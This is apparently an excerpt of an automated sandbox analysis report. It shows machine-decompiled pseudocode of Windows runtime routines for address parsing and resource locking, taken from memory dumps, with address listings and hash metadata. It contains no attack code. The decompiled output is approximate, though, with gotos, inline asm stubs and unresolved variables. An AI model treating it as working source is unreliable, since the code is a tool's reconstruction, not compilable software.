                                                                                                                                                  							_v12 = _v12 + 1;
                                                                                                                                                  							L20:
                                                                                                                                                  							_t179 = _t179 + 1;
                                                                                                                                                  							_t141 =  *_t179;
                                                                                                                                                  							if(_t141 == 0) {
                                                                                                                                                  								goto L41;
                                                                                                                                                  							}
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  						L7:
                                                                                                                                                  						if(_t141 == 0x3a) {
                                                                                                                                                  							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                  								goto L41;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t130 = _t179 + 1;
                                                                                                                                                  								if( *_t130 != _t141) {
                                                                                                                                                  									goto L41;
                                                                                                                                                  								}
                                                                                                                                                  								_v20 = _v20 + 1;
                                                                                                                                                  								_t156 = 2;
                                                                                                                                                  								_v32 = 1;
                                                                                                                                                  								_v8 = _t156;
                                                                                                                                                  								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                  								goto L34;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						L8:
                                                                                                                                                  						if(_v8 > 7) {
                                                                                                                                                  							goto L41;
                                                                                                                                                  						}
                                                                                                                                                  						_t142 = _t141;
                                                                                                                                                  						if(E00C906BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                  							if(E00C906BA(_t124, _t142) == 0 || E00C90A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                  								goto L41;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t128 = 1;
                                                                                                                                                  								_a7 = 1;
                                                                                                                                                  								_v28 = _t179;
                                                                                                                                                  								_v16 = 1;
                                                                                                                                                  								_v12 = 1;
                                                                                                                                                  								L39:
                                                                                                                                                  								if(_v16 == _t128) {
                                                                                                                                                  									goto L20;
                                                                                                                                                  								}
                                                                                                                                                  								goto L28;
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							_a7 = 0;
                                                                                                                                                  							_v28 = _t179;
                                                                                                                                                  							_v16 = 1;
                                                                                                                                                  							_v12 = 1;
                                                                                                                                                  							goto L20;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				L1:
                                                                                                                                                  				_t123 = _t108 == 1;
                                                                                                                                                  				if(_t108 == 1) {
                                                                                                                                                  					goto L8;
                                                                                                                                                  				}
                                                                                                                                                  				_t128 = 1;
                                                                                                                                                  				goto L39;
                                                                                                                                                  			}

























                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90b56
                                                                                                                                                  0x00c90b62
                                                                                                                                                  0x00c90b7c
                                                                                                                                                  0x00c90bac
                                                                                                                                                  0x00c90a0f
                                                                                                                                                  0x00cbeaaa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeac4
                                                                                                                                                  0x00cbeac4
                                                                                                                                                  0x00c90bd0
                                                                                                                                                  0x00c90bd0
                                                                                                                                                  0x00c90bd4
                                                                                                                                                  0x00c90bd9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90bdb
                                                                                                                                                  0x00c90be0
                                                                                                                                                  0x00cbeb0e
                                                                                                                                                  0x00c90a1a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90a1a
                                                                                                                                                  0x00cbeb1a
                                                                                                                                                  0x00cbeb1f
                                                                                                                                                  0x00cbeb27
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeb36
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeb36
                                                                                                                                                  0x00c90bea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90bf6
                                                                                                                                                  0x00c90c00
                                                                                                                                                  0x00c90c03
                                                                                                                                                  0x00c90c0b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90c0b
                                                                                                                                                  0x00cbeaaa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90a15
                                                                                                                                                  0x00c90bb6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90bc6
                                                                                                                                                  0x00c90bc6
                                                                                                                                                  0x00c90bcb
                                                                                                                                                  0x00c90c15
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90c1d
                                                                                                                                                  0x00c90c20
                                                                                                                                                  0x00c90c21
                                                                                                                                                  0x00c90c24
                                                                                                                                                  0x00c90c24
                                                                                                                                                  0x00c90c26
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90c26
                                                                                                                                                  0x00c90bcd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90bcd
                                                                                                                                                  0x00c90b89
                                                                                                                                                  0x00c90b89
                                                                                                                                                  0x00c90b90
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90b96
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90b96
                                                                                                                                                  0x00c90a04
                                                                                                                                                  0x00c90a04
                                                                                                                                                  0x00c90b9a
                                                                                                                                                  0x00c90b9a
                                                                                                                                                  0x00c90b9b
                                                                                                                                                  0x00c90b9f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90ba5
                                                                                                                                                  0x00c90ac7
                                                                                                                                                  0x00c90aca
                                                                                                                                                  0x00cbeacf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeade
                                                                                                                                                  0x00cbeade
                                                                                                                                                  0x00cbeae3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeaf3
                                                                                                                                                  0x00cbeaf6
                                                                                                                                                  0x00cbeaf7
                                                                                                                                                  0x00cbeafe
                                                                                                                                                  0x00cbeb01
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeb01
                                                                                                                                                  0x00cbeacf
                                                                                                                                                  0x00c90ad0
                                                                                                                                                  0x00c90ad4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90ada
                                                                                                                                                  0x00c90ae6
                                                                                                                                                  0x00c90c34
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90c47
                                                                                                                                                  0x00c90c49
                                                                                                                                                  0x00c90c4a
                                                                                                                                                  0x00c90c4e
                                                                                                                                                  0x00c90c51
                                                                                                                                                  0x00c90c54
                                                                                                                                                  0x00c90c57
                                                                                                                                                  0x00c90c5a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90c60
                                                                                                                                                  0x00c90afb
                                                                                                                                                  0x00c90afe
                                                                                                                                                  0x00c90b02
                                                                                                                                                  0x00c90b05
                                                                                                                                                  0x00c90b08
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c90b08
                                                                                                                                                  0x00c90ae6
                                                                                                                                                  0x00c90b44
                                                                                                                                                  0x00c909f8
                                                                                                                                                  0x00c909f8
                                                                                                                                                  0x00c909f9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeaa0
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fassign
                                                                                                                                                  • String ID: .$:$:
                                                                                                                                                  • API String ID: 3965848254-2308638275
                                                                                                                                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                  • Instruction ID: e6bd51c700a303c33195f0c3ef0ea221edfbb2758b99d9bdd27856e5f66462f5
                                                                                                                                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                  • Instruction Fuzzy Hash: 0EA19D7190430AEFCF24CF64C84D6BEB7B5AF05305F34856AE862A7242DB309B41DB92
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                  			E00C90554(signed int _a4, char _a8) {
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				signed int* _t49;
                                                                                                                                                  				signed int _t51;
                                                                                                                                                  				signed int _t56;
                                                                                                                                                  				signed int _t58;
                                                                                                                                                  				signed int _t61;
                                                                                                                                                  				signed int _t63;
                                                                                                                                                  				void* _t66;
                                                                                                                                                  				intOrPtr _t67;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				signed int _t70;
                                                                                                                                                  				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00d301c0;
									_push(_t144);
									_push(0);
									_t51 = E00C4F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00C94FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00CA3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00CA3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00CD217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00CA3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00C93915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00d301c0;
												_push(_t138);
												_push(0);
												_t58 = E00C4F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00C94FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00CA3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00CA3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00CD217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00CA3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00C93915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00C75384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00C4F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00C93915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00C4F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00C93915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00C4F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00C93915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
                                                                                                                                                  																	}
                                                                                                                                                  																	goto L59;
                                                                                                                                                  																}
                                                                                                                                                  																E00C75329(_t110, _t138);
                                                                                                                                                  																_t69 = E00C753A5(_t138, 1);
                                                                                                                                                  																return _t69;
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											} else {
                                                                                                                                                  												_t56 =  *(_t96 + 0x28);
                                                                                                                                                  												goto L3;
                                                                                                                                                  											}
                                                                                                                                                  										} else {
                                                                                                                                                  											_t107 =  *_t119;
                                                                                                                                                  											__eflags = _t107;
                                                                                                                                                  											if(__eflags > 0) {
                                                                                                                                                  												while(1) {
                                                                                                                                                  													_t81 = _t107;
                                                                                                                                                  													asm("lock cmpxchg [edi], esi");
                                                                                                                                                  													__eflags = _t81 - _t107;
                                                                                                                                                  													if(_t81 == _t107) {
                                                                                                                                                  														break;
                                                                                                                                                  													}
                                                                                                                                                  													_t107 = _t81;
                                                                                                                                                  													__eflags = _t81;
                                                                                                                                                  													if(_t81 > 0) {
                                                                                                                                                  														continue;
                                                                                                                                                  													}
                                                                                                                                                  													break;
                                                                                                                                                  												}
                                                                                                                                                  												_t56 = _a4;
                                                                                                                                                  												__eflags = _t107;
                                                                                                                                                  											}
                                                                                                                                                  											if(__eflags != 0) {
                                                                                                                                                  												while(1) {
                                                                                                                                                  													L3:
                                                                                                                                                  													__eflags = _t56;
                                                                                                                                                  													if(_t56 != 0) {
                                                                                                                                                  														goto L32;
                                                                                                                                                  													}
                                                                                                                                                  													_t107 = _t107 | 0xffffffff;
                                                                                                                                                  													_t56 = 0;
                                                                                                                                                  													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                  													__eflags = 0;
                                                                                                                                                  													if(0 != 0) {
                                                                                                                                                  														continue;
                                                                                                                                                  													} else {
                                                                                                                                                  														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                  														return 1;
                                                                                                                                                  													}
                                                                                                                                                  													goto L59;
                                                                                                                                                  												}
                                                                                                                                                  												continue;
                                                                                                                                                  											} else {
                                                                                                                                                  												goto L40;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										goto L59;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = 0;
                                                                                                                                                  									return 0;
                                                                                                                                                  								} else {
                                                                                                                                                  									_t115 =  *(_t96 + 0x28);
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  							} else {
                                                                                                                                                  								_t106 =  *_t49;
                                                                                                                                                  								__eflags = _t106;
                                                                                                                                                  								if(__eflags > 0) {
                                                                                                                                                  									while(1) {
                                                                                                                                                  										_t93 = _t106;
                                                                                                                                                  										asm("lock cmpxchg [edi], esi");
                                                                                                                                                  										__eflags = _t93 - _t106;
                                                                                                                                                  										if(_t93 == _t106) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										_t106 = _t93;
                                                                                                                                                  										__eflags = _t93;
                                                                                                                                                  										if(_t93 > 0) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t106;
                                                                                                                                                  								}
                                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                                  									continue;
                                                                                                                                                  								} else {
                                                                                                                                                  									goto L23;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						goto L59;
                                                                                                                                                  					}
                                                                                                                                                  					_t84 = _t115;
                                                                                                                                                  					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                  					__eflags = _t84 - _t115;
                                                                                                                                                  					if(_t84 != _t115) {
                                                                                                                                                  						_t115 = _t84;
                                                                                                                                                  						goto L7;
                                                                                                                                                  					} else {
                                                                                                                                                  						return 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				L59:
                                                                                                                                                  			}




































                                                                                                                                                  0x00cb22bc
                                                                                                                                                  0x00cb22be
                                                                                                                                                  0x00cb22c4
                                                                                                                                                  0x00cb22cc
                                                                                                                                                  0x00cb22d0
                                                                                                                                                  0x00cb22d6
                                                                                                                                                  0x00cb22d7
                                                                                                                                                  0x00cb22da
                                                                                                                                                  0x00cb22df
                                                                                                                                                  0x00cb22e4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb22e6
                                                                                                                                                  0x00cb22e9
                                                                                                                                                  0x00cb22f4
                                                                                                                                                  0x00cb22f9
                                                                                                                                                  0x00cb22fa
                                                                                                                                                  0x00cb2305
                                                                                                                                                  0x00cb2314
                                                                                                                                                  0x00cb2319
                                                                                                                                                  0x00cb231a
                                                                                                                                                  0x00cb231d
                                                                                                                                                  0x00cb2320
                                                                                                                                                  0x00cb2323
                                                                                                                                                  0x00cb2323
                                                                                                                                                  0x00cb2328
                                                                                                                                                  0x00cb232d
                                                                                                                                                  0x00cb232f
                                                                                                                                                  0x00cb2331
                                                                                                                                                  0x00cb2336
                                                                                                                                                  0x00cb2336
                                                                                                                                                  0x00cb233b
                                                                                                                                                  0x00cb233d
                                                                                                                                                  0x00cb2350
                                                                                                                                                  0x00cb2351
                                                                                                                                                  0x00cb2356
                                                                                                                                                  0x00cb2359
                                                                                                                                                  0x00cb2359
                                                                                                                                                  0x00cb235b
                                                                                                                                                  0x00cb235d
                                                                                                                                                  0x00c75367
                                                                                                                                                  0x00c7536b
                                                                                                                                                  0x00c75372
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb2363
                                                                                                                                                  0x00cb2363
                                                                                                                                                  0x00cb2369
                                                                                                                                                  0x00cb236a
                                                                                                                                                  0x00cb236c
                                                                                                                                                  0x00cb2371
                                                                                                                                                  0x00cb2373
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb2379
                                                                                                                                                  0x00cb2379
                                                                                                                                                  0x00cb237a
                                                                                                                                                  0x00cb237f
                                                                                                                                                  0x00cb237f
                                                                                                                                                  0x00cb2385
                                                                                                                                                  0x00cb2386
                                                                                                                                                  0x00cb2389
                                                                                                                                                  0x00cb238e
                                                                                                                                                  0x00cb2390
                                                                                                                                                  0x00c75378
                                                                                                                                                  0x00c7537c
                                                                                                                                                  0x00cb2396
                                                                                                                                                  0x00cb2396
                                                                                                                                                  0x00cb2397
                                                                                                                                                  0x00cb239c
                                                                                                                                                  0x00cb23a2
                                                                                                                                                  0x00cb23a3
                                                                                                                                                  0x00cb23a6
                                                                                                                                                  0x00cb23ab
                                                                                                                                                  0x00cb23ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb23b3
                                                                                                                                                  0x00cb23b3
                                                                                                                                                  0x00cb23b4
                                                                                                                                                  0x00cb23b9
                                                                                                                                                  0x00cb23ba
                                                                                                                                                  0x00cb23ba
                                                                                                                                                  0x00cb23bc
                                                                                                                                                  0x00cb23bf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca9153
                                                                                                                                                  0x00ca9158
                                                                                                                                                  0x00ca915a
                                                                                                                                                  0x00ca915e
                                                                                                                                                  0x00ca9160
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca9166
                                                                                                                                                  0x00ca9166
                                                                                                                                                  0x00ca9171
                                                                                                                                                  0x00ca9176
                                                                                                                                                  0x00ca9176
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca9160
                                                                                                                                                  0x00cb23c6
                                                                                                                                                  0x00cb23ce
                                                                                                                                                  0x00cb23d7
                                                                                                                                                  0x00cb23d7
                                                                                                                                                  0x00cb23ad
                                                                                                                                                  0x00cb2390
                                                                                                                                                  0x00cb2373
                                                                                                                                                  0x00cb233f
                                                                                                                                                  0x00cb233f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb233f
                                                                                                                                                  0x00cb2291
                                                                                                                                                  0x00cb2291
                                                                                                                                                  0x00cb2293
                                                                                                                                                  0x00cb2295
                                                                                                                                                  0x00cb229a
                                                                                                                                                  0x00cb22a1
                                                                                                                                                  0x00cb22a3
                                                                                                                                                  0x00cb22a7
                                                                                                                                                  0x00cb22a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb22ab
                                                                                                                                                  0x00cb22ad
                                                                                                                                                  0x00cb22af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb22af
                                                                                                                                                  0x00cb22b1
                                                                                                                                                  0x00cb22b4
                                                                                                                                                  0x00cb22b4
                                                                                                                                                  0x00cb22b6
                                                                                                                                                  0x00c753be
                                                                                                                                                  0x00c753be
                                                                                                                                                  0x00c753be
                                                                                                                                                  0x00c753c0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c753cb
                                                                                                                                                  0x00c753ce
                                                                                                                                                  0x00c753d0
                                                                                                                                                  0x00c753d4
                                                                                                                                                  0x00c753d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c753d8
                                                                                                                                                  0x00c753e3
                                                                                                                                                  0x00c753ea
                                                                                                                                                  0x00c753ea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c753d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb22b6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb228f
                                                                                                                                                  0x00cb2349
                                                                                                                                                  0x00cb234d
                                                                                                                                                  0x00cb2251
                                                                                                                                                  0x00cb2251
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb2251
                                                                                                                                                  0x00cb21a4
                                                                                                                                                  0x00cb21a4
                                                                                                                                                  0x00cb21a6
                                                                                                                                                  0x00cb21a8
                                                                                                                                                  0x00cb21ac
                                                                                                                                                  0x00cb21b6
                                                                                                                                                  0x00cb21b8
                                                                                                                                                  0x00cb21bc
                                                                                                                                                  0x00cb21be
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb21c0
                                                                                                                                                  0x00cb21c2
                                                                                                                                                  0x00cb21c4

                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB2206
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-4236105082
                                                                                                                                                  • Opcode ID: 3bb0a6db4643c2f38385e334a65a7356b863ed329525940fd3805efab516142a
                                                                                                                                                  • Instruction ID: 93ad5486a5b10546661c951a05a95390dddab6609e178dc802c778adb1581c39
                                                                                                                                                  • Opcode Fuzzy Hash: 3bb0a6db4643c2f38385e334a65a7356b863ed329525940fd3805efab516142a
                                                                                                                                                  • Instruction Fuzzy Hash: 32516D357002426FEF14CE58CC82FE633A9AF94725F218269FD64DF285DA31ED828794
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E00C914C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				char _v10;
                                                                                                                                                  				char _v140;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				signed int _t24;
                                                                                                                                                  				void* _t26;
                                                                                                                                                  				signed int _t29;
                                                                                                                                                  				signed int _t34;
                                                                                                                                                  				signed int _t40;
                                                                                                                                                  				intOrPtr _t45;
                                                                                                                                                  				void* _t51;
                                                                                                                                                  				intOrPtr* _t52;
                                                                                                                                                  				void* _t54;
                                                                                                                                                  				signed int _t57;
                                                                                                                                                  				void* _t58;
                                                                                                                                                  
                                                                                                                                                  				_t51 = __edx;
                                                                                                                                                  				_t24 =  *0xd32088; // 0x777a2caa
                                                                                                                                                  				_v8 = _t24 ^ _t57;
                                                                                                                                                  				_t45 = _a16;
                                                                                                                                                  				_t53 = _a4;
                                                                                                                                                  				_t52 = _a20;
                                                                                                                                                  				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                  					L10:
                                                                                                                                                  					_t26 = 0xc000000d;
                                                                                                                                                  				} else {
                                                                                                                                                  					if(_t45 == 0) {
                                                                                                                                                  						if( *_t52 == _t45) {
                                                                                                                                                  							goto L3;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L10;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						L3:
                                                                                                                                                  						_t28 =  &_v140;
                                                                                                                                                  						if(_a12 != 0) {
                                                                                                                                                  							_push("[");
                                                                                                                                                  							_push(0x41);
                                                                                                                                                  							_push( &_v140);
                                                                                                                                                  							_t29 = E00C87707();
                                                                                                                                                  							_t58 = _t58 + 0xc;
